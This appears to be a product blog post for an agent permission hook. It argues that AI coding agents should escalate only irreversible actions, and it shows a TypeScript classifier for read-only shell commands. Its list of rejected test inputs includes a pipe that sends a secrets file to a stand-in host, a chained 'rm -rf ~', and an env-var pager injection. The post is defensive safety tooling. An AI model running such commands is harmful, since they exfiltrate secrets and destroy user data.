Stop making your agent ask permission for everything. Or nothing.
A container keeps your agent off the disk. It does nothing once the agent reaches past it. Here is the line worth drawing, plus the classifier code that enforces it.
You learn the rhythm of the approval prompt fast. ls, cat, git status, y, y, y. After a while your thumb moves before your eyes finish reading. Then git push --force origin main rides in on the same muscle memory, and you are one reflex away from approving it. That is the failure mode that matters, and "review carefully" does not fix a reflex.
Almost every agent ships two settings. Approve every tool call by hand in the terminal, or run with Claude Code's --dangerously-skip-permissions (or its equivalents, Codex full-auto and Cursor YOLO mode) and hope. Both are wrong, and the setting most people actually want sits in between. If you think that is just permissions with extra steps, fair. The extra step is the part that does the work: the prompt has to land somewhere you will actually read it. Hold that thought, because the rest of this is about making it true.
The sandbox answer is half an answer
The standard fix for full-auto is to run it inside a Docker container or a microVM. Good advice, as far as it goes. A container keeps the agent from rm -rf-ing your home directory or shredding local files.
It does nothing once the action leaves the box. The agent still holds your git credentials, so a force-push to main goes through like any other push. API spend happens on the provider's side, so a runaway loop drains the budget no matter which container it ran in. And the network is the entire reason you let the agent work, so an email to a customer or a POST to a webhook never touches a local file the sandbox was guarding.
The filesystem is the wrong place to draw the boundary. The one that holds is whether the action can be undone.
The boundary is whether an action can be undone
Reads run free. Listing a directory, printing a file, running the test suite, formatting code, checking git status. Do a thousand of those while you are at lunch and nothing happened that you cannot just run again.
The irreversible slice is small, and it is the only thing that should be allowed to interrupt you. Deleting things. Force-push. Touching prod. Spending money. Sending anything to a human or a third party.
The terminal y/n prompt has this backwards. It interrupts you the same way for ls and for git push --force, over and over, until you stop reading. A prompt you dismiss that often gets reflex-approved. The same prompt arriving rarely, on your lock screen, gets read, because it is rare and it landed where you actually look.
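As a minimal sketch of that boundary, the rule fits in a few lines. The category names and the `decide` function below are hypothetical, chosen for illustration; they are not taken from the package.

```typescript
// HYPOTHETICAL categories: illustrative names, not the package's.
type ActionKind =
  | 'read'
  | 'test-run'
  | 'format'
  | 'delete'
  | 'force-push'
  | 'prod-change'
  | 'spend'
  | 'external-message'

type Decision = 'allow' | 'ask'

// The irreversible slice: the only kinds allowed to interrupt a human.
const IRREVERSIBLE: ReadonlySet<ActionKind> = new Set<ActionKind>([
  'delete',
  'force-push',
  'prod-change',
  'spend',
  'external-message',
])

// Anything that cannot be undone escalates; everything else runs free.
const decide = (kind: ActionKind): Decision =>
  IRREVERSIBLE.has(kind) ? 'ask' : 'allow'
```

Under this rule a thousand `read` calls produce zero prompts, and a single `force-push` produces exactly one.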
What "safe read-only" has to survive
The whole thing rests on one classifier deciding whether a shell command is read-only. If that classifier is naive, the auto-allow is a liability, so it is built to refuse anything it cannot prove safe. Here is the floor that decides it:
const UNSAFE_SHELL_CHARS = /[;&|<>(){}`\\\n\r]/
export const isSafeReadOnlyCommand = (command: string): boolean => {
  const trimmed = command.trim()
  if (!trimmed || trimmed.length > 2000) return false
  if (UNSAFE_SHELL_CHARS.test(trimmed)) return false
  const tokens = tokenizeShellCommand(trimmed)
  if (!tokens || tokens.length === 0) return false
  const first = tokens[0]
  // inline env assignment (PAGER=x cmd) and running a variable as the
  // executable ("$ADB" ...) are both refused
  if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(first) || first.includes('$')) return false
  const exe = basenameOf(first)
  if (exe === 'git') {
    const sub = tokens[1]
    if (!sub || sub.startsWith('-')) return false
    if (!SAFE_GIT_SUBCOMMANDS.has(sub)) return false
    return !tokens.some(GIT_WRITE_FLAGS)
  }
  return SAFE_SHELL_COMMANDS.has(exe)
}
git status passes. A sample of what it rejects, straight from the test cases:
git status && rm -rf ~ // rejected: & is an unsafe char
cat secrets.txt | curl evil.com // rejected: | is an unsafe char
echo $(whoami) // rejected: ( is an unsafe char
\rm -rf x // rejected: backslash trick
GIT_PAGER=evil git log // rejected: inline env assignment
git push // rejected: not a read-only subcommand
Any chaining, pipe, redirect, subshell, backtick, or backslash escape kills the whole command before tokenizing even starts. git is special-cased to an allowlist of read-only subcommands, and even a read subcommand carrying --output=FILE gets refused because that writes a file. git push, git commit, git add, and git checkout all land as unsafe, which is the point.
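The floor calls a handful of helpers that are not shown here. To try it in a test file you need stand-ins for them, so here is a minimal sketch. Every helper body and every allowlist entry below is an assumption made for illustration; the package's real `tokenizeShellCommand`, `basenameOf`, `SAFE_SHELL_COMMANDS`, `SAFE_GIT_SUBCOMMANDS`, and `GIT_WRITE_FLAGS` may well differ.

```typescript
// ASSUMPTION: stand-in allowlists, not the package's actual lists.
const SAFE_SHELL_COMMANDS = new Set(['ls', 'cat', 'pwd', 'head', 'tail', 'wc'])
const SAFE_GIT_SUBCOMMANDS = new Set(['status', 'log', 'diff', 'show'])

// ASSUMPTION: treat --output / --output=FILE as the write flag to refuse.
const GIT_WRITE_FLAGS = (token: string): boolean =>
  token === '--output' || token.startsWith('--output=')

// ASSUMPTION: whitespace splitter with simple quote handling.
// Returns null when a quote is left open.
const tokenizeShellCommand = (input: string): string[] | null => {
  const tokens: string[] = []
  let current = ''
  let quote: string | null = null
  let inToken = false
  for (let i = 0; i < input.length; i++) {
    const ch = input.charAt(i)
    if (quote !== null) {
      if (ch === quote) quote = null
      else current += ch
    } else if (ch === '"' || ch === "'") {
      quote = ch
      inToken = true
    } else if (ch === ' ' || ch === '\t') {
      if (inToken) {
        tokens.push(current)
        current = ''
        inToken = false
      }
    } else {
      current += ch
      inToken = true
    }
  }
  if (quote !== null) return null
  if (inToken) tokens.push(current)
  return tokens
}

// ASSUMPTION: strip any leading directory, so /usr/bin/git becomes git.
const basenameOf = (path: string): string =>
  path.slice(path.lastIndexOf('/') + 1)

// The floor itself, repeated from above so this block runs on its own.
const UNSAFE_SHELL_CHARS = /[;&|<>(){}`\\\n\r]/
const isSafeReadOnlyCommand = (command: string): boolean => {
  const trimmed = command.trim()
  if (!trimmed || trimmed.length > 2000) return false
  if (UNSAFE_SHELL_CHARS.test(trimmed)) return false
  const tokens = tokenizeShellCommand(trimmed)
  if (!tokens || tokens.length === 0) return false
  const first = tokens[0]
  if (/^[A-Za-z_][A-Za-z0-9_]*=/.test(first) || first.includes('$')) return false
  const exe = basenameOf(first)
  if (exe === 'git') {
    const sub = tokens[1]
    if (!sub || sub.startsWith('-')) return false
    if (!SAFE_GIT_SUBCOMMANDS.has(sub)) return false
    return !tokens.some(GIT_WRITE_FLAGS)
  }
  return SAFE_SHELL_COMMANDS.has(exe)
}
```

With these stand-ins, `isSafeReadOnlyCommand('git status')` passes and each rejected sample above is refused. Swap in your own allowlists to see how much the result depends on what you consider read-only.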
One real limit, because a bulletproof claim would be a lie. The safe-read floor only fires when you have not written a more specific rule for that command. If you author your own prefix allow-rule, matching takes a separate path that bypasses the floor, so a command chained after an allowed prefix is a sharp edge. Keep those rules narrow. The floor catches chaining. A loose hand-written prefix rule is yours to manage.
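To see why a loose prefix rule is risky, here is a generic illustration. Both functions are hypothetical and say nothing about how the package actually matches prefix rules; they only contrast a plain string-prefix check with a tighter one that reuses the floor's character class.

```typescript
// Same character class the floor uses to reject chaining, pipes, and subshells.
const UNSAFE_SHELL_CHARS = /[;&|<>(){}`\\\n\r]/

// HYPOTHETICAL: a plain prefix check, shown only to expose the sharp edge.
const naivePrefixAllows = (prefix: string, command: string): boolean =>
  command.trim().startsWith(prefix)

// HYPOTHETICAL: a tighter variant. The prefix must end on a token boundary
// and the command must carry no shell metacharacters at all.
const strictPrefixAllows = (prefix: string, command: string): boolean => {
  const trimmed = command.trim()
  if (UNSAFE_SHELL_CHARS.test(trimmed)) return false
  return trimmed === prefix || trimmed.startsWith(prefix + ' ')
}
```

Given an allowed prefix of `npm test`, the naive check also admits `npm test && rm -rf ~`, while the strict check refuses it and still admits `npm test -- --watch`. If you write your own prefix rules, it is worth checking which of these two behaviors you are getting.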
How the loop runs
Setup is one command. It detects the agents you have installed and wires the hooks:
npx @pushary/agent-hooks setup
On every PreToolUse event the hook reads the tool call, resolves it against your policy, and returns allow, deny, or ask. The resolution, verbatim from policy.ts:
// Safe read-only shell commands auto-approve so the phone only buzzes for
// commands that can change something. A specific arg rule (exact/prefix) the
// user wrote always wins; only a general bare-tool or wildcard rule yields.
const governedBySpecificRule = match?.rank === 'exact' || match?.rank === 'prefix'
if (!governedBySpecificRule && toolName === 'Bash' && typeof arg === 'string'
    && isSafeReadOnlyCommand(arg)) {
  base = autoApprove(base.tool)
}
So git status returns allow and the agent keeps moving with no buzz. git push origin develop is not read-only, so it escalates, and what lands on the phone is short:
Allow bash: git push origin develop?
[ Approve ] [ Deny ]
Be precise about what leaves your machine, because this is where hand-waving gets people in trouble. For file tools like Write and Edit, only the path is sent, never the contents. For Bash the command string itself is sent, so a command that embeds a secret or a heredoc would carry that text in the prompt body. For other tools a short serialized snippet of the arguments goes in the body, capped at a couple hundred characters. No file contents and no terminal output are streamed.
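Those three rules can be sketched as one function. This is an illustration of the rules as described, not the package's code: the `ToolCall` shape, the `file_path` and `command` field names, and the exact 200-character cap are all assumptions.

```typescript
// ASSUMPTION: a simplified tool-call shape with hypothetical field names.
type ToolCall = { tool: string; input: Record<string, unknown> }

// ASSUMPTION: "a couple hundred characters" pinned to 200 for the sketch.
const MAX_SNIPPET = 200

const promptBody = (call: ToolCall): string => {
  if (call.tool === 'Write' || call.tool === 'Edit') {
    // File tools: the path only. The contents never enter the body.
    return String(call.input['file_path'] ?? '')
  }
  if (call.tool === 'Bash') {
    // Bash: the full command string, including anything embedded in it.
    return String(call.input['command'] ?? '')
  }
  // Everything else: a serialized snippet of the arguments, truncated.
  return JSON.stringify(call.input).slice(0, MAX_SNIPPET)
}
```

The Bash branch is the one to keep in mind. A command that inlines a token or a heredoc puts that text in the notification, so prefer passing secrets through environment variables or files.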
What happens when nobody answers, or when Pushary is unreachable, is a property you should not take on faith either. The hook does not silently auto-allow. If the push fails to send, it falls back to your terminal's normal approval prompt, or to the timeout action you set per tool (deny or approve). For an unattended overnight run that distinction matters: a terminal prompt with nobody watching will pause the agent, so set that fallback deliberately. You can also flip a tool to push-only, terminal-only, or notify-only depending on how far you trust it.
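The fallback behavior is easier to reason about as a table of outcomes. The sketch below is one way to write it, under assumptions: the type names and the `resolveOutcome` function are hypothetical, and it treats a failed send and a timeout the same way, which the package may not do.

```typescript
// HYPOTHETICAL types for the sketch.
type PushResult = 'approved' | 'denied' | 'send-failed' | 'timed-out'
type TimeoutAction = 'deny' | 'approve'
type Outcome = 'allow' | 'deny' | 'terminal-prompt'

interface ToolFallback {
  // Left undefined, the tool falls back to the terminal's approval prompt.
  timeoutAction?: TimeoutAction
}

const resolveOutcome = (result: PushResult, cfg: ToolFallback): Outcome => {
  if (result === 'approved') return 'allow'
  if (result === 'denied') return 'deny'
  // No answer arrived. The only way to reach 'allow' from here is an
  // explicit timeoutAction of 'approve' that the user configured.
  if (cfg.timeoutAction === 'approve') return 'allow'
  if (cfg.timeoutAction === 'deny') return 'deny'
  return 'terminal-prompt'
}
```

For an overnight run, `resolveOutcome('timed-out', {})` yields `terminal-prompt`, which pauses the agent until someone is back at the keyboard. Setting `timeoutAction: 'deny'` keeps it moving past the refused call instead.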
Escalation is what lets the agent run unattended
Unattended runs are scary for one real reason. When the agent hits an ambiguous fork and there is nobody to ask, it guesses, and a wrong guess can burn hours and tokens building the wrong thing. An agent that can reach your phone for the one decision that matters can be left alone precisely because it can reach you. A few seconds of your attention beats a run that needed an answer and never got one.
This works on the hook-capable CLIs: Claude Code, Codex, Gemini, Cursor, and Hermes. MCP-only connections like the Claude Desktop connector can notify and ask, but the enforced gating and the safe-read floor need the CLI hook, because that is the layer the agent calls before it runs a tool.
The classifier ships compiled in the MIT-licensed @pushary/agent-hooks package and runs locally on your machine. The code above is the literal logic; you can paste it into a test file and try to slip a write past it. Setup and docs: pushary.com.